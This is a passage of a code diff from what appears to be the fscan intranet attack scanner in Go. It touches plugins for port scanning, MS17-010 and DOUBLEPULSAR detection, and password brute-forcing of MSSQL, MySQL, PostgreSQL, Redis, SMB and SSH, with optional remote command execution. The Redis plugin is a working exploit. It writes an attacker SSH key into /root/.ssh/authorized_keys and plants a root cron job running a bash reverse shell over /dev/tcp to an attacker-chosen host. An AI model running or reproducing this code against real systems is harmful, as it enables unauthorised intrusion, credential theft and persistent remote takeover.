common.LogSuccess(result)
}
}
return flag,err
}
return flag, err
}

18
Plugins/ms17017.go
View File

@@ -3,14 +3,11 @@ package Plugins
import (
"encoding/binary"
"encoding/hex"
"sync"
//"flag"
"fmt"
"github.com/shadow1ng/fscan/common"
"net"
"../common"
"strings"
//"sync"
"sync"
"time"
)
@@ -22,10 +19,10 @@ var (
trans2SessionSetupRequest, _ = hex.DecodeString("0000004eff534d4232000000001807c00000000000000000000000000008fffe000841000f0c0000000100000000000000a6d9a40000000c00420000004e0001000e000d0000000000000000000000000000")
)
func MS17010(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
func MS17010(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
MS17010Scan(info)
wg.Done()
<- ch
<-ch
}
func MS17010Scan(info *common.HostInfo) {
@@ -39,7 +36,7 @@ func MS17010Scan(info *common.HostInfo) {
}
defer conn.Close()
conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout)*time.Second))
conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
conn.Write(negotiateProtocolRequest)
reply := make([]byte, 1024)
// let alone half packet
@@ -78,7 +75,7 @@ func MS17010Scan(info *common.HostInfo) {
for i := 10; i < len(sessionSetupResponse)-1; i++ {
if sessionSetupResponse[i] == 0 && sessionSetupResponse[i+1] == 0 {
os = string(sessionSetupResponse[10:i])
os = strings.Replace(os, string([]byte{0x00}), "",-1)
os = strings.Replace(os, string([]byte{0x00}), "", -1)
break
}
}
@@ -110,7 +107,7 @@ func MS17010Scan(info *common.HostInfo) {
//fmt.Printf("%s\tMS17-010\t(%s)\n", ip, os)
//if runtime.GOOS=="windows" {fmt.Printf("%s\tMS17-010\t(%s)\n", ip, os)
//} else{fmt.Printf("\033[33m%s\tMS17-010\t(%s)\033[0m\n", ip, os)}
result := fmt.Sprintf("%s\tMS17-010\t(%s)", ip, os)
result := fmt.Sprintf("[+] %s\tMS17-010\t(%s)", ip, os)
common.LogSuccess(result)
// detect present of DOUBLEPULSAR SMB implant
trans2SessionSetupRequest[28] = treeID[0]
@@ -136,4 +133,3 @@ func MS17010Scan(info *common.HostInfo) {
}
}

32
Plugins/mssql.go
View File

@@ -1,48 +1,44 @@
package Plugins
import (
"../common"
"database/sql"
"fmt"
_ "github.com/denisenkom/go-mssqldb"
"github.com/shadow1ng/fscan/common"
"strings"
"sync"
"time"
)
func MssqlScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
func MssqlScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
Loop:
for _,user:=range common.Userdict["mssql"]{
for _,pass:=range common.Passwords{
pass = strings.Replace(pass, "{user}", string(user), -1)
flag,err := MssqlConn(info,user,pass,ch,wg)
if flag==true && err==nil {
for _, user := range common.Userdict["mssql"] {
for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
flag, err := MssqlConn(info, user, pass)
if flag == true && err == nil {
break Loop
}
}
}
wg.Done()
<- ch
<-ch
}
func MssqlConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
func MssqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host,Port,Username,Password := info.Host, common.PORTList["mssql"],user, pass
dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%d;encrypt=disable;timeout=%d", Host,Username,Password,Port,time.Duration(info.Timeout)*time.Second)
Host, Port, Username, Password := info.Host, common.PORTList["mssql"], user, pass
dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%d;encrypt=disable;timeout=%d", Host, Username, Password, Port, time.Duration(info.Timeout)*time.Second)
db, err := sql.Open("mssql", dataSourceName)
if err == nil {
db.SetConnMaxLifetime(time.Duration(info.Timeout)*time.Second)
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
defer db.Close()
err = db.Ping()
if err == nil {
result := fmt.Sprintf("mssql:%v:%v:%v %v",Host,Port,Username,Password)
result := fmt.Sprintf("[+] mssql:%v:%v:%v %v", Host, Port, Username, Password)
common.LogSuccess(result)
flag = true
}
}
return flag,err
return flag, err
}

35
Plugins/mysql.go
View File

@@ -1,46 +1,45 @@
package Plugins
import (
"../common"
"database/sql"
"fmt"
_ "github.com/go-sql-driver/mysql"
"strings"
"sync"
"time"
_ "github.com/go-sql-driver/mysql"
"github.com/shadow1ng/fscan/common"
)
func MysqlScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
func MysqlScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
Loop:
for _,user:=range common.Userdict["mysql"]{
for _,pass:=range common.Passwords{
pass = strings.Replace(pass, "{user}", string(user), -1)
flag,err := MysqlConn(info,user,pass,ch,wg)
if flag==true && err==nil {
for _, user := range common.Userdict["mysql"] {
for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
flag, err := MysqlConn(info, user, pass)
if flag == true && err == nil {
break Loop
}
}
}
wg.Done()
<- ch
<-ch
}
func MysqlConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
func MysqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host,Port,Username,Password := info.Host, common.PORTList["mysql"],user, pass
dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/%v?charset=utf8", Username, Password, Host,Port, "mysql")
Host, Port, Username, Password := info.Host, common.PORTList["mysql"], user, pass
dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/%v?charset=utf8", Username, Password, Host, Port, "mysql")
db, err := sql.Open("mysql", dataSourceName)
db.SetConnMaxLifetime(time.Duration(info.Timeout)*time.Second)
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
if err == nil {
defer db.Close()
err = db.Ping()
if err == nil {
result := fmt.Sprintf("mysql:%v:%v:%v %v",Host,Port,Username,Password)
result := fmt.Sprintf("[+] mysql:%v:%v:%v %v", Host, Port, Username, Password)
common.LogSuccess(result)
flag = true
}
}
return flag,err
}
return flag, err
}

76
Plugins/portscan.go
View File

@@ -2,13 +2,13 @@ package Plugins
import (
"fmt"
"github.com/shadow1ng/fscan/common"
"net"
"sort"
"strconv"
"strings"
"sync"
"time"
"../common"
)
func ParsePort(ports string) []int {
@@ -35,37 +35,30 @@ func ParsePort(ports string) []int {
return scanPorts
}
func ProbeHosts(host string, ports <-chan int, respondingHosts chan<- string, done chan<- bool, model string, adjustedTimeout int) {
Timeout := time.Duration(adjustedTimeout) * time.Second
for port := range ports{
start := time.Now()
con, err := net.DialTimeout("tcp4", fmt.Sprintf("%s:%d", host, port), time.Duration(adjustedTimeout) * time.Second)
duration := time.Now().Sub(start)
func ProbeHosts(host string, ports <-chan int, respondingHosts chan<- string, done chan<- bool, adjustedTimeout int) {
for port := range ports {
con, err := net.DialTimeout("tcp4", fmt.Sprintf("%s:%d", host, port), time.Duration(adjustedTimeout)*time.Second)
if err == nil {
defer con.Close()
address := host + ":" + strconv.Itoa(port)
result := fmt.Sprintf("%s open",address)
result := fmt.Sprintf("%s open", address)
common.LogSuccess(result)
respondingHosts <- address
}
if duration < Timeout {
difference := Timeout - duration
Timeout = Timeout - (difference / 2)
}
}
done <- true
}
func ScanAllports(address string, probePorts []int, threads int, timeout time.Duration, model string, adjustedTimeout int) ([]string, error) {
func ScanAllports(address string, probePorts []int, threads int, adjustedTimeout int) ([]string, error) {
ports := make(chan int, 20)
results := make(chan string, 10)
done := make(chan bool, threads)
for worker := 0; worker < threads; worker++ {
go ProbeHosts(address, ports, results, done, model, adjustedTimeout)
go ProbeHosts(address, ports, results, done, adjustedTimeout)
}
for _,port := range probePorts{
for _, port := range probePorts {
ports <- port
}
close(ports)
@@ -80,61 +73,53 @@ func ScanAllports(address string, probePorts []int, threads int, timeout time.Du
if threads == 0 {
return responses, nil
}
case <-time.After(timeout):
return responses, nil
}
}
}
func TCPportScan(hostslist []string,ports string,model string,timeout int) ([]string,[]string){
func TCPportScan(hostslist []string, ports string, timeout int) ([]string, []string) {
var AliveAddress []string
var aliveHosts []string
probePorts := ParsePort(ports)
lm := 20
if (len(hostslist)>5 && len(hostslist)<=50) {
if len(hostslist) > 5 && len(hostslist) <= 50 {
lm = 40
}else if(len(hostslist)>50 && len(hostslist)<=100){
} else if len(hostslist) > 50 && len(hostslist) <= 100 {
lm = 50
}else if(len(hostslist)>100 && len(hostslist)<=150){
} else if len(hostslist) > 100 && len(hostslist) <= 150 {
lm = 60
}else if(len(hostslist)>150 && len(hostslist)<=200){
} else if len(hostslist) > 150 && len(hostslist) <= 200 {
lm = 70
}else if(len(hostslist)>200){
} else if len(hostslist) > 200 {
lm = 75
}
thread := 5
if (len(probePorts)>500 && len(probePorts)<=4000) {
thread = len(probePorts)/100
}else if (len(probePorts)>4000 && len(probePorts)<=6000) {
thread = len(probePorts)/200
}else if (len(probePorts)>6000 && len(probePorts)<=10000) {
thread = len(probePorts)/350
}else if (len(probePorts)>10000 && len(probePorts)<50000){
thread = len(probePorts)/400
}else if (len(probePorts)>=50000 && len(probePorts)<=65535){
thread = len(probePorts)/500
if len(probePorts) > 500 && len(probePorts) <= 4000 {
thread = len(probePorts) / 100
} else if len(probePorts) > 4000 && len(probePorts) <= 6000 {
thread = len(probePorts) / 200
} else if len(probePorts) > 6000 && len(probePorts) <= 10000 {
thread = len(probePorts) / 350
} else if len(probePorts) > 10000 && len(probePorts) < 50000 {
thread = len(probePorts) / 400
} else if len(probePorts) >= 50000 && len(probePorts) <= 65535 {
thread = len(probePorts) / 500
}
var wg sync.WaitGroup
mutex := &sync.Mutex{}
limiter := make(chan struct{}, lm)
aliveHost := make(chan string, lm/2)
go func() {
for s := range aliveHost {
fmt.Println(s)
}
}()
for _,host :=range hostslist{
for _, host := range hostslist {
wg.Add(1)
limiter <- struct{}{}
go func(host string) {
defer wg.Done()
if aliveAdd, err := ScanAllports(host, probePorts,thread, 5*time.Second,model,timeout);err == nil && len(aliveAdd)>0{
if aliveAdd, err := ScanAllports(host, probePorts, thread, timeout); err == nil && len(aliveAdd) > 0 {
mutex.Lock()
aliveHosts = append(aliveHosts,host)
for _,addr :=range aliveAdd{
AliveAddress = append(AliveAddress,addr)
aliveHosts = append(aliveHosts, host)
for _, addr := range aliveAdd {
AliveAddress = append(AliveAddress, addr)
}
mutex.Unlock()
}
@@ -142,6 +127,5 @@ func TCPportScan(hostslist []string,ports string,model string,timeout int) ([]s
}(host)
}
wg.Wait()
close(aliveHost)
return aliveHosts,AliveAddress
return aliveHosts, AliveAddress
}

31
Plugins/postgres.go
View File

@@ -1,46 +1,45 @@
package Plugins
import (
"../common"
"database/sql"
"fmt"
_ "github.com/lib/pq"
"strings"
"sync"
"time"
_ "github.com/lib/pq"
"github.com/shadow1ng/fscan/common"
)
func PostgresScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
func PostgresScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
Loop:
for _,user:=range common.Userdict["postgresql"]{
for _,pass:=range common.Passwords{
for _, user := range common.Userdict["postgresql"] {
for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", string(user), -1)
flag,err := PostgresConn(info,user,pass,ch,wg)
if flag==true && err==nil {
flag, err := PostgresConn(info, user, pass)
if flag == true && err == nil {
break Loop
}
}
}
wg.Done()
<- ch
<-ch
}
func PostgresConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
func PostgresConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host,Port,Username,Password := info.Host, common.PORTList["psql"],user, pass
dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host,Port, "postgres", "disable")
Host, Port, Username, Password := info.Host, common.PORTList["psql"], user, pass
dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host, Port, "postgres", "disable")
db, err := sql.Open("mysql", dataSourceName)
if err == nil {
db.SetConnMaxLifetime(time.Duration(info.Timeout)*time.Second)
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
defer db.Close()
err = db.Ping()
if err == nil {
result := fmt.Sprintf("Postgres:%v:%v:%v %v",Host,Port,Username,Password)
result := fmt.Sprintf("Postgres:%v:%v:%v %v", Host, Port, Username, Password)
common.LogSuccess(result)
flag = true
}
}
return flag,err
return flag, err
}

197
Plugins/redis.go
View File

@@ -1,9 +1,9 @@
package Plugins
import (
"../common"
"bufio"
"fmt"
"github.com/shadow1ng/fscan/common"
"net"
"os"
"strings"
@@ -11,171 +11,166 @@ import (
"time"
)
func RedisScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
flag,err := RedisUnauth(info)
if flag==true && err==nil {
func RedisScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
flag, err := RedisUnauth(info)
if flag == true && err == nil {
wg.Done()
<- ch
<-ch
return
}
Loop:
for _,pass:=range common.Passwords{
pass = strings.Replace(pass, "{user}", string("redis"), -1)
flag,err := RedisConn(info,pass,ch,wg)
if flag==true && err==nil {
break Loop
}
for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", string("redis"), -1)
flag, err := RedisConn(info, pass)
if flag == true && err == nil {
break Loop
}
}
wg.Done()
<- ch
<-ch
}
func RedisConn(info *common.HostInfo,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
flag = false
realhost:=fmt.Sprintf("%s:%d",info.Host,common.PORTList["redis"])
conn,err := net.DialTimeout("tcp",realhost,time.Duration(info.Timeout)*time.Second)
if err != nil{
return flag,err
realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["redis"])
conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
if err != nil {
return flag, err
}
defer conn.Close()
conn.Write([]byte(fmt.Sprintf("auth %s\r\n",pass)))
reply,err := readreply(conn)
//common.LogSuccess(result)
if strings.Contains(reply,"+OK"){
result := fmt.Sprintf("Redis:%s %s",realhost,pass)
conn.Write([]byte(fmt.Sprintf("auth %s\r\n", pass)))
reply, err := readreply(conn)
if strings.Contains(reply, "+OK") {
result := fmt.Sprintf("[+] Redis:%s %s", realhost, pass)
common.LogSuccess(result)
flag = true
Expoilt(info ,realhost,conn)
Expoilt(info, realhost, conn)
}
return flag,err
return flag, err
}
func RedisUnauth(info *common.HostInfo) (flag bool,err error) {
func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
flag = false
realhost:=fmt.Sprintf("%s:%d",info.Host,common.PORTList["redis"])
conn,err := net.DialTimeout("tcp",realhost,time.Duration(info.Timeout)*time.Second)
if err != nil{
return flag,err
realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["redis"])
conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
if err != nil {
return flag, err
}
defer conn.Close()
conn.Write([]byte("info\r\n"))
reply,err := readreply(conn)
if strings.Contains(reply,"redis_version"){
result := fmt.Sprintf("Redis:%s unauthorized",realhost)
reply, err := readreply(conn)
if strings.Contains(reply, "redis_version") {
result := fmt.Sprintf("[+] Redis:%s unauthorized", realhost)
common.LogSuccess(result)
flag = true
Expoilt(info ,realhost,conn)
Expoilt(info, realhost, conn)
}
return flag,err
return flag, err
}
func Expoilt(info *common.HostInfo,realhost string,conn net.Conn) {
flagSsh,flagCron := testwrite(conn)
if flagSsh == true{
result := fmt.Sprintf("Redis:%v like can write /root/.ssh/",realhost)
func Expoilt(info *common.HostInfo, realhost string, conn net.Conn) {
flagSsh, flagCron := testwrite(conn)
if flagSsh == true {
result := fmt.Sprintf("Redis:%v like can write /root/.ssh/", realhost)
common.LogSuccess(result)
if info.RedisFile != ""{
if writeok,text := writekey(conn,info.RedisFile);writeok{
result := fmt.Sprintf("%v SSH public key was written successfully",realhost)
if info.RedisFile != "" {
if writeok, text := writekey(conn, info.RedisFile); writeok {
result := fmt.Sprintf("%v SSH public key was written successfully", realhost)
common.LogSuccess(result)
}else {
fmt.Println(realhost,"SSHPUB write failed",text)
} else {
fmt.Println("Redis:", realhost, "SSHPUB write failed", text)
}
}
}
if flagCron == true{
result := fmt.Sprintf("Redis:%v like can write /var/spool/cron/",realhost)
if flagCron == true {
result := fmt.Sprintf("Redis:%v like can write /var/spool/cron/", realhost)
common.LogSuccess(result)
if info.RedisShell != "" {
if writeok,text := writecron(conn,info.RedisShell);writeok{
result := fmt.Sprintf("%v /var/spool/cron/root was written successfully",realhost)
if writeok, text := writecron(conn, info.RedisShell); writeok {
result := fmt.Sprintf("%v /var/spool/cron/root was written successfully", realhost)
common.LogSuccess(result)
}else {
fmt.Println(realhost,"cron write failed",text)
} else {
fmt.Println("Redis:", realhost, "cron write failed", text)
}
}
}
}
func writekey(conn net.Conn,filename string) (flag bool,text string) {
func writekey(conn net.Conn, filename string) (flag bool, text string) {
flag = false
conn.Write([]byte(fmt.Sprintf("CONFIG SET dir /root/.ssh/\r\n")))
text,_ = readreply(conn)
if strings.Contains(text,"OK") {
text, _ = readreply(conn)
if strings.Contains(text, "OK") {
conn.Write([]byte(fmt.Sprintf("CONFIG SET dbfilename authorized_keys\r\n")))
text,_ = readreply(conn)
if strings.Contains(text,"OK") {
key,_ := Readfile(filename)
conn.Write([]byte(fmt.Sprintf("set x \"\\n\\n\\n%v\\n\\n\\n\"\r\n",key)))
text,_ = readreply(conn)
if strings.Contains(text,"OK") {
text, _ = readreply(conn)
if strings.Contains(text, "OK") {
key, _ := Readfile(filename)
conn.Write([]byte(fmt.Sprintf("set x \"\\n\\n\\n%v\\n\\n\\n\"\r\n", key)))
text, _ = readreply(conn)
if strings.Contains(text, "OK") {
conn.Write([]byte(fmt.Sprintf("save\r\n")))
text,_ = readreply(conn)
if strings.Contains(text,"OK") {
text, _ = readreply(conn)
if strings.Contains(text, "OK") {
flag = true
}
}
}
}
if len(text) > 50{
text = strings.TrimSpace(text)
if len(text) > 50 {
text = text[:50]
}
return flag,text
return flag, text
}
func writecron(conn net.Conn,host string) (flag bool,text string) {
func writecron(conn net.Conn, host string) (flag bool, text string) {
flag = false
conn.Write([]byte(fmt.Sprintf("CONFIG SET dir /var/spool/cron/\r\n")))
text,_ = readreply(conn)
if strings.Contains(text,"OK") {
text, _ = readreply(conn)
if strings.Contains(text, "OK") {
conn.Write([]byte(fmt.Sprintf("CONFIG SET dbfilename root\r\n")))
text,_ = readreply(conn)
if strings.Contains(text,"OK") {
scan_ip,scan_port := strings.Split(host,":")[0],strings.Split(host,":")[1]
conn.Write([]byte(fmt.Sprintf("set xx \"\\n* * * * * bash -i >& /dev/tcp/%v/%v 0>&1\\n\"\r\n",scan_ip,scan_port)))
text,_ = readreply(conn)
if strings.Contains(text,"OK") {
text, _ = readreply(conn)
if strings.Contains(text, "OK") {
scan_ip, scan_port := strings.Split(host, ":")[0], strings.Split(host, ":")[1]
conn.Write([]byte(fmt.Sprintf("set xx \"\\n* * * * * bash -i >& /dev/tcp/%v/%v 0>&1\\n\"\r\n", scan_ip, scan_port)))
text, _ = readreply(conn)
if strings.Contains(text, "OK") {
conn.Write([]byte(fmt.Sprintf("save\r\n")))
text,_ = readreply(conn)
if strings.Contains(text,"OK") {
text, _ = readreply(conn)
if strings.Contains(text, "OK") {
flag = true
}
}
}
}
if len(text) > 50{
} //else {fmt.Println(text)}
} //else {fmt.Println(text)}
} //else {fmt.Println(text)}
} //else {fmt.Println(text)}
text = strings.TrimSpace(text)
if len(text) > 50 {
text = text[:50]
}
return flag,text
return flag, text
}
func Readfile(filename string)(string,error){
func Readfile(filename string) (string, error) {
file, err := os.Open(filename)
if err!=nil{
fmt.Println("Open %s error, %v", filename,err)
return err.Error(),err
if err != nil {
fmt.Println("Open %s error, %v", filename, err)
return err.Error(), err
}
defer file.Close()
scanner := bufio.NewScanner(file)
//scanner.Split(bufio.ScanLines)
for scanner.Scan() {
//text := strings.TrimSpace(scanner.Text())
text := scanner.Text()
text := strings.TrimSpace(scanner.Text())
if text != "" {
return text,nil
return text, nil
}
}
return err.Error(),err
return err.Error(), err
}
func readreply(conn net.Conn) (result string,err error) {
func readreply(conn net.Conn) (result string, err error) {
buf := make([]byte, 4096)
for {
count, err := conn.Read(buf)
@@ -187,22 +182,22 @@ func readreply(conn net.Conn) (result string,err error) {
break
}
}
return result,err
return result, err
}
func testwrite(conn net.Conn) (flagSsh bool,flagCron bool) {
func testwrite(conn net.Conn) (flagSsh bool, flagCron bool) {
flagSsh = false
flagCron = false
var text string
conn.Write([]byte(fmt.Sprintf("CONFIG SET dir /root/.ssh/\r\n")))
text,_ = readreply(conn)
if strings.Contains(string(text),"OK") {
text, _ = readreply(conn)
if strings.Contains(string(text), "OK") {
flagSsh = true
}
conn.Write([]byte(fmt.Sprintf("CONFIG SET dir /var/spool/cron/\r\n")))
text,_ = readreply(conn)
if strings.Contains(string(text),"OK") {
text, _ = readreply(conn)
if strings.Contains(string(text), "OK") {
flagCron = true
}
return flagSsh,flagCron
}
return flagSsh, flagCron
}

73
Plugins/scanner.go
View File

@@ -1,29 +1,28 @@
package Plugins
import (
"../common"
"errors"
"fmt"
"reflect"
"strconv"
"strings"
"sync"
"github.com/shadow1ng/fscan/common"
)
func scan_func(m map[string]interface{}, name string, infos ...interface{}) (result []reflect.Value, err error) {
f := reflect.ValueOf(m[name])
if len(infos) != f.Type().NumIn() {
err = errors.New("The number of infos is not adapted.")
if err != nil {
fmt.Println(err.Error())
// //os.Exit(0)
}
fmt.Println(err.Error())
}
in := make([]reflect.Value, len(infos))
for k, info := range infos {
in[k] = reflect.ValueOf(info)
}
result = f.Call(in)
return result,nil
return result, nil
}
func IsContain(items []string, item string) bool {
for _, eachItem := range items {
@@ -34,51 +33,49 @@ func IsContain(items []string, item string) bool {
return false
}
func Scan(info *common.HostInfo) {
Hosts,_ := common.ParseIP(info.Host,info.HostFile)
if info.Isping == false{
Hosts = ICMPRun(Hosts)
func Scan(info common.HostInfo) {
fmt.Println("scan start")
Hosts, _ := common.ParseIP(info.Host, info.HostFile)
if info.Isping == false {
Hosts = ICMPRun(Hosts, info.IcmpThreads, info.Ping)
fmt.Println("icmp alive hosts len is:", len(Hosts))
}
_,AlivePorts := TCPportScan(Hosts,info.Ports,"icmp",3) //return AliveHosts,AlivePorts
var severports []string //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"}
for _,port:=range common.PORTList{
severports = append(severports,strconv.Itoa(port))
_, AlivePorts := TCPportScan(Hosts, info.Ports, 3) //return AliveHosts,AlivePorts
var severports []string //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"...}
for _, port := range common.PORTList {
severports = append(severports, strconv.Itoa(port))
}
severports1 := []string{"1521"}
var ch = make(chan int,info.Threads)
severports1 := []string{"1521"} //no scan these service
var ch = make(chan int, info.Threads)
var wg = sync.WaitGroup{}
var scantype string
for _,targetIP :=range AlivePorts{
scan_ip,scan_port := strings.Split(targetIP,":")[0],strings.Split(targetIP,":")[1]
for _, targetIP := range AlivePorts {
scan_ip, scan_port := strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
info.Host = scan_ip
if info.Scantype == "all"{
if IsContain(severports,scan_port){
//scantype = scan_port
AddScan(scan_port,info,ch,&wg)
}else {
if !IsContain(severports1,scan_port){
info.Url = fmt.Sprintf("http://%s",targetIP)
wg.Add(1)
go WebTitle(info,ch,&wg) //go scan_func(PluginList,"WebTitle",info,ch,&wg)
ch <- 1
info.Ports = scan_port
if info.Scantype == "all" {
if IsContain(severports, scan_port) {
AddScan(scan_port, info, ch, &wg)
} else {
if !IsContain(severports1, scan_port) {
AddScan("1000003", info, ch, &wg) //webtitle
}
}
if scan_port == "445"{
AddScan("1000001",info,ch,&wg)
AddScan("1000002",info,ch,&wg)
if scan_port == "445" { //scan more vul
AddScan("1000001", info, ch, &wg)
AddScan("1000002", info, ch, &wg)
}
}else {
port,_:=common.PORTList[info.Scantype]
} else {
port, _ := common.PORTList_bak[info.Scantype]
scantype = strconv.Itoa(port)
AddScan(scantype,info,ch,&wg)
AddScan(scantype, info, ch, &wg)
}
}
wg.Wait()
}
func AddScan(scantype string,info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
func AddScan(scantype string, info common.HostInfo, ch chan int, wg *sync.WaitGroup) {
wg.Add(1)
go scan_func(PluginList,scantype,info,ch,wg)
go scan_func(PluginList, scantype, &info, ch, wg)
ch <- 1
}
}

53
Plugins/smb.go
View File

@@ -1,74 +1,75 @@
package Plugins
import (
"../common"
"context"
"fmt"
"github.com/shadow1ng/fscan/common"
"github.com/stacktitan/smb/smb"
"strings"
"sync"
"time"
"context"
)
func SmbScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
func SmbScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
Loop:
for _,user:=range common.Userdict["smb"]{
for _,pass:=range common.Passwords{
for _, user := range common.Userdict["smb"] {
for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", string(user), -1)
//flag,err := SmblConn(info,user,pass)
flag,err := doWithTimeOut(info,user,pass)
//fmt.Println(user,pass,flag,err)
if flag==true && err==nil {
flag, err := doWithTimeOut(info, user, pass)
if flag == true && err == nil {
break Loop
}
}
}
wg.Done()
<- ch
<-ch
}
func SmblConn(info *common.HostInfo,user string,pass string)(flag bool,err error){
func SmblConn(info *common.HostInfo, user string, pass string, Domain string) (flag bool, err error) {
flag = false
Host,Port,Username,Password := info.Host, common.PORTList["smb"],user, pass
Host, Port, Username, Password := info.Host, common.PORTList["smb"], user, pass
options := smb.Options{
Host: Host,
Port: 445,
User: Username,
Password: Password,
Domain: "",
Domain: Domain,
Workstation: "",
Timeout: info.Timeout,
}
session, err := smb.NewSession(options, false)
//fmt.Println(err)
if err == nil {
defer session.Close()
if session.IsAuthenticated {
result := fmt.Sprintf("SMB:%v:%v:%v %v",Host,Port,Username,Password)
var result string
if Domain != "" {
result = fmt.Sprintf("SMB:%v:%v:%v\\%v %v", Host, Port, Domain, Username, Password)
} else {
result = fmt.Sprintf("SMB:%v:%v:%v %v", Host, Port, Username, Password)
}
common.LogSuccess(result)
flag = true
}
}
return flag,err
return flag, err
}
func doWithTimeOut(info *common.HostInfo,user string,pass string)(flag bool,err error){
ctx,cancel := context.WithTimeout(context.Background(),time.Duration(info.Timeout)*time.Second)
//ctx,cancel := context.WithTimeout(context.Background(),1*time.Second)
func doWithTimeOut(info *common.HostInfo, user string, pass string) (flag bool, err error) {
ctx, cancel := context.WithTimeout(context.Background(), time.Duration(info.Timeout)*time.Second)
defer cancel()
signal := make(chan int,1)
signal := make(chan int, 1)
go func() {
flag,err = SmblConn(info,user,pass)
flag, err = SmblConn(info, user, pass, info.Domain)
signal <- 1
}()
select {
case <-signal:
return flag,err
return flag, err
case <-ctx.Done():
return false,err
return false, err
}
}
}

45
Plugins/ssh.go
View File

@@ -1,46 +1,39 @@
package Plugins
import (
"../common"
"fmt"
"github.com/shadow1ng/fscan/common"
"golang.org/x/crypto/ssh"
"net"
"strings"
"sync"
"time"
)
func SshScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
//SshConn(info,"oracle","oracle",ch,wg)
func SshScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
Loop:
for _,user:=range common.Userdict["ssh"]{
for _,pass:=range common.Passwords{
pass = strings.Replace(pass, "{user}", string(user), -1)
//wg.Add(1)
//var good bool
//go SshConn(info,user,pass,ch,wg)
//if good == true{
// break Loop
//}
flag,err := SshConn(info,user,pass,ch,wg)
if flag==true && err==nil {
for _, user := range common.Userdict["ssh"] {
for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
flag, err := SshConn(info, user, pass)
if flag == true && err == nil {
break Loop
}
}
}
wg.Done()
<- ch
<-ch
}
func SshConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host,Port,Username,Password := info.Host, common.PORTList["ssh"],user, pass
//fmt.Println(Host,Port,Username,Password)
Host, Port, Username, Password := info.Host, common.PORTList["ssh"], user, pass
config := &ssh.ClientConfig{
User: Username,
Auth: []ssh.AuthMethod{
ssh.Password(Password),
},
Timeout: time.Duration(info.Timeout)*time.Second,
Timeout: time.Duration(info.Timeout) * time.Second,
HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error {
return nil
},
@@ -50,19 +43,19 @@ func SshConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.
if err == nil {
defer client.Close()
session, err := client.NewSession()
if err == nil { //if err == nil && errRet == nil {
if err == nil {
defer session.Close()
flag = true
if info.Command != ""{
combo,_ := session.CombinedOutput(info.Command)
result := fmt.Sprintf("SSH:%v:%v:%v %v \n %v",Host,Port,Username,Password,string(combo))
if info.Command != "" {
combo, _ := session.CombinedOutput(info.Command)
result := fmt.Sprintf("SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
common.LogSuccess(result)
}else {
result := fmt.Sprintf("SSH:%v:%v:%v %v",Host,Port,Username,Password)
} else {
result := fmt.Sprintf("[+] SSH:%v:%v:%v %v", Host, Port, Username, Password)
common.LogSuccess(result)
}
}
}
return flag,err
return flag, err
}

92
Plugins/webtitle.go
View File

@@ -1,84 +1,68 @@
package Plugins
import (
"../common"
"crypto/tls"
"fmt"
"github.com/shadow1ng/fscan/WebScan"
"github.com/shadow1ng/fscan/common"
"io/ioutil"
"net/http"
"regexp"
"strings"
"sync"
"time"
)
func WebTitle(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) (err error, result string) {
err,result = geturl(info)
wg.Done()
